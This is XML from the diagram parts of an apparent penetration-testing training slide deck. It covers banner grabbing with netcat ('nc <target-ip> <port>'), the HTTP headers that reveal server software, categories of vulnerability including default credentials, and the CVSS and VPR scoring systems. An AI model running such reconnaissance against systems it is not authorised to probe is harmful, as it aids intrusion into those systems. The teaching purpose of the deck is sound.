    <dgm:cxn modelId="{82C0C618-73F3-4F3A-BED6-A25FC5ECDB9B}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0925A263-7B2F-4F9B-921C-F2A8D10CEACC}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{B211F55F-0C42-4F6F-AF65-8144B7BFF4CA}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{05D70D46-4DB2-4FAE-BBA4-496E422A0513}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{F6AE7433-5EEC-4378-A05D-F3A839F6A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8C8CE5-E4EA-4218-9977-2EF98B45D4D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21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>To grab the banner from a specific service :</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E25CBFA7-1532-4069-8CA2-9C51A6942698}" type="parTrans" cxnId="{D2CFC633-8470-4ABD-A7DC-848BA9C1F519}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3612F2A-AF9A-42CF-8CB8-19436F6FEA92}" type="sibTrans" cxnId="{D2CFC633-8470-4ABD-A7DC-848BA9C1F519}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44F5B0F7-3F69-42C5-B457-519F90D58621}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>nc &lt;target-ip&gt; &lt;port&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8BF4E80-777B-4DC9-BAF6-8625FBF303E7}" type="parTrans" cxnId="{B58EA7FE-E1D7-47B4-8487-2A85197FBCBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58867E44-B9E4-4643-BF8C-6CE267F99934}" type="sibTrans" cxnId="{B58EA7FE-E1D7-47B4-8487-2A85197FBCBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB6B32D2-115A-448B-B41C-CFB99CF99805}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>The output should be :</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88406C92-5CD8-457C-87B6-72DE40C266D8}" type="parTrans" cxnId="{8043B73B-223E-4E22-B9B6-6C71B0895894}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5C46BE5-44EC-4258-8C05-97B1FD91E6E0}" type="sibTrans" cxnId="{8043B73B-223E-4E22-B9B6-6C71B0895894}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Date</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>: The current date and time.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F36F76C-861C-49FF-B95F-9273066E1D7B}" type="parTrans" cxnId="{AB09CB34-9C3D-4D78-A781-296CA5B0BDC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48452367-A353-4590-AD2B-34EB640D5724}" type="sibTrans" cxnId="{AB09CB34-9C3D-4D78-A781-296CA5B0BDC0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Server</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>: The server software and version</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73170CA3-F129-4523-9117-65E0F7CA5023}" type="parTrans" cxnId="{72E56284-253A-4B2B-8E9F-F0875ADE5BDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E98D7330-76AB-47FD-9782-26D3FF341673}" type="sibTrans" cxnId="{72E56284-253A-4B2B-8E9F-F0875ADE5BDB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Content-Type</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>: Information about the type of content being served.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A01ADCD-D19B-4C75-A4AE-35844B15FCC9}" type="parTrans" cxnId="{C06CFB3C-B173-4AE7-8327-AC60C46E9FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23A78B2F-D483-4F83-BACE-CE8E849EBBAF}" type="sibTrans" cxnId="{C06CFB3C-B173-4AE7-8327-AC60C46E9FA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5044780E-2F2C-496B-BECA-8E68F5782001}" type="pres">
      <dgm:prSet presAssocID="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AEECAE1B-884F-4774-B933-5D47C3004D94}" type="pres">
      <dgm:prSet presAssocID="{21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96AA0972-6E3C-45BD-8C6D-4F4C9978E48B}" type="pres">
      <dgm:prSet presAssocID="{B3612F2A-AF9A-42CF-8CB8-19436F6FEA92}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}" type="pres">
      <dgm:prSet presAssocID="{44F5B0F7-3F69-42C5-B457-519F90D58621}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3B0B5F2-DE31-4833-964B-4F16BCD954F4}" type="pres">
      <dgm:prSet presAssocID="{58867E44-B9E4-4643-BF8C-6CE267F99934}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}" type="pres">
      <dgm:prSet presAssocID="{AB6B32D2-115A-448B-B41C-CFB99CF99805}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{81032588-36C2-4691-9357-AE649A0A680E}" type="pres">
      <dgm:prSet presAssocID="{B5C46BE5-44EC-4258-8C05-97B1FD91E6E0}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}" type="pres">
      <dgm:prSet presAssocID="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB0F5527-E37D-42F8-86F7-B1FDB0E86506}" type="pres">
      <dgm:prSet presAssocID="{48452367-A353-4590-AD2B-34EB640D5724}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{088FD0FD-CC52-435F-9C92-DC437C875497}" type="pres">
      <dgm:prSet presAssocID="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2951FE59-54AF-4E1E-839A-30A4031024D5}" type="pres">
      <dgm:prSet presAssocID="{E98D7330-76AB-47FD-9782-26D3FF341673}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E410}" type="pres">
      <dgm:prSet presAssocID="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{D2CFC633-8470-4ABD-A7DC-848BA9C1F519}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}" srcOrd="0" destOrd="0" parTransId="{E25CBFA7-1532-4069-8CA2-9C51A6942698}" sibTransId="{B3612F2A-AF9A-42CF-8CB8-19436F6FEA92}"/>
    <dgm:cxn modelId="{AB09CB34-9C3D-4D78-A781-296CA5B0BDC0}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}" srcOrd="3" destOrd="0" parTransId="{4F36F76C-861C-49FF-B95F-9273066E1D7B}" sibTransId="{48452367-A353-4590-AD2B-34EB640D5724}"/>
    <dgm:cxn modelId="{8043B73B-223E-4E22-B9B6-6C71B0895894}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{AB6B32D2-115A-448B-B41C-CFB99CF99805}" srcOrd="2" destOrd="0" parTransId="{88406C92-5CD8-457C-87B6-72DE40C266D8}" sibTransId="{B5C46BE5-44EC-4258-8C05-97B1FD91E6E0}"/>
    <dgm:cxn modelId="{C06CFB3C-B173-4AE7-8327-AC60C46E9FA7}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}" srcOrd="5" destOrd="0" parTransId="{7A01ADCD-D19B-4C75-A4AE-35844B15FCC9}" sibTransId="{23A78B2F-D483-4F83-BACE-CE8E849EBBAF}"/>
    <dgm:cxn modelId="{1D90F669-7900-40AC-BFBC-68CABBD0A972}" type="presOf" srcId="{44F5B0F7-3F69-42C5-B457-519F90D58621}" destId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{DEA95383-9658-4352-8F93-FCB0044B945C}" type="presOf" srcId="{21459CFC-DA24-4AB9-9F7D-89A3BAB899DC}" destId="{AEECAE1B-884F-4774-B933-5D47C3004D94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{72E56284-253A-4B2B-8E9F-F0875ADE5BDB}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}" srcOrd="4" destOrd="0" parTransId="{73170CA3-F129-4523-9117-65E0F7CA5023}" sibTransId="{E98D7330-76AB-47FD-9782-26D3FF341673}"/>
    <dgm:cxn modelId="{DCE7A386-E15D-4FD7-A651-46CE58191BCB}" type="presOf" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{5044780E-2F2C-496B-BECA-8E68F5782001}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{CE5B11BA-4EF3-41DE-B34D-383B0B8307D9}" type="presOf" srcId="{ACF0F9B8-E36E-44EA-8915-1893C9A8A585}" destId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A4F561CA-1966-4BB1-9516-C2D7582A67E8}" type="presOf" srcId="{45011C20-82A8-42AE-BA21-6BF4CDC12B50}" destId="{088FD0FD-CC52-435F-9C92-DC437C875497}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A262CFF0-E951-4BAA-B29A-ED2A9B929EDA}" type="presOf" srcId="{AB6B32D2-115A-448B-B41C-CFB99CF99805}" destId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B58EA7FE-E1D7-47B4-8487-2A85197FBCBF}" srcId="{AA8C8CE5-E4EA-4218-9977-2EF98B45D4DC}" destId="{44F5B0F7-3F69-42C5-B457-519F90D58621}" srcOrd="1" destOrd="0" parTransId="{B8BF4E80-777B-4DC9-BAF6-8625FBF303E7}" sibTransId="{58867E44-B9E4-4643-BF8C-6CE267F99934}"/>
    <dgm:cxn modelId="{C6983CFF-9E11-43E6-9C72-379ED41EC7C2}" type="presOf" srcId="{9041E6C3-D6E6-4847-9429-DCF3728D1D55}" destId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E410}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3C3B0C2B-B3F7-4F9B-B652-9C53BF512B73}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{AEECAE1B-884F-4774-B933-5D47C3004D94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{80DEE7BB-6152-42AC-9329-99FB24D53DB7}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{96AA0972-6E3C-45BD-8C6D-4F4C9978E48B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{71D1A855-FFD3-4105-B215-AFBC3CA37B55}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4A07E9DD-82D8-4650-A676-F3142BF143E7}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{C3B0B5F2-DE31-4833-964B-4F16BCD954F4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8A47BCA0-D95F-420E-97EC-D12DEFE7BF61}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{55B35606-D627-43ED-8179-CFFEE7DE4276}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{81032588-36C2-4691-9357-AE649A0A680E}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F1ADDAED-E89A-49AD-A926-D5C4E5696618}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{21576533-B8D3-4310-8A60-02D4AF03717C}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{BB0F5527-E37D-42F8-86F7-B1FDB0E86506}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3EBE032A-94A9-4FCE-998B-954A12F0F728}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{088FD0FD-CC52-435F-9C92-DC437C875497}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{AE93A397-E83B-4694-8575-8739BC702F91}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{2951FE59-54AF-4E1E-839A-30A4031024D5}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{20CEE6EC-3EA4-4024-83AD-7EE860167805}" type="presParOf" srcId="{5044780E-2F2C-496B-BECA-8E68F5782001}" destId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E41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FDF0B-6643-4627-9C4F-407B6B7004B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1225"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8901D-01D5-442C-BBF3-ED6F538051F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="479178"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Knowing about vulnerabilities is essential for penetration testers, as they will often exploit these to assess security during engagements.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="559181" y="660351"/>
        <a:ext cx="4141574" cy="2571497"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{87A1B657-444F-437B-A7DB-2183CE8074A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5258712"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7EFF4-6D45-4449-8017-216DD6B9DE61}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5736666"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Vulnerabilities play a critical role in an organization's vulnerability management, where the goal is to identify, prioritize, and mitigate potential threats.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5816669" y="660351"/>
        <a:ext cx="4141574" cy="2571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6F6EC-D4B4-4EE3-9832-4387E440CBD6}">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01616-B0C4-415D-B7AF-29F864105B68}">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E0191F-8FBF-4239-A8FA-9F4CD2D68705}">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Operating System Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Often lead to privilege escalation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="4307"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC8816F6-C443-4C38-8B2D-1A4C58BA2F4E}">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74396-6D6D-46A2-85D0-BD58C82E8386}">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1F707-86AA-48F1-AA87-5B77320F775C}">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Misconfiguration-Based Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Result from incorrect configuration, such as exposing sensitive data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="1151227"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0041D5B-A451-4BE7-97ED-ECB827100573}">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E1EAD-6482-4F32-BDAB-A2E0D9356CFF}">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52A9B-CCC7-496B-8D6B-8B0EAA4B3AD7}">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Weak or Default Credentials</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Easily guessable login credentials like “admin/admin.”</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="2298147"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8429B3F8-0692-4580-AAAD-ACB10A105C3E}">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1A647-2598-4220-851B-58FCDFB51709}">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57FABA-4393-4E78-AC84-092FA64D5A16}">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Application Logic Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Flaws in how an application operates, which can be exploited to bypass security.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="3445068"/>
        <a:ext cx="5304469" cy="917536"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{92C6FA6F-4A29-442D-B552-CD287699C562}">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D19B2-7CF6-41F0-BDCF-8B3E74F85A38}">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400EC-2719-40EB-94E6-DB42C7CE8C38}">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Human-Factor Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" i="0" kern="1200" baseline="0"/>
            <a:t>: Attacks like phishing that exploit human behavio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200"/>
            <a:t>r</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1059754" y="4591988"/>
        <a:ext cx="5304469" cy="917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A984D-9BFF-4512-8A99-EAB101533A67}">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Common Vulnerability Scoring System (CVSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>Scores vulnerabilities based on factors like exploitability, impact, and availability.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>Scores range from 0 (None) to 10 (Critical).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200"/>
            <a:t>Advantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>: Long-standing, popular, free.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0"/>
            <a:t>Disadvantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            <a:t>: Not designed for prioritization, often static scores.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6556AB75-E671-47A5-873B-916EC07768D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737"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Vulnerability Priority Rating (VPR)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
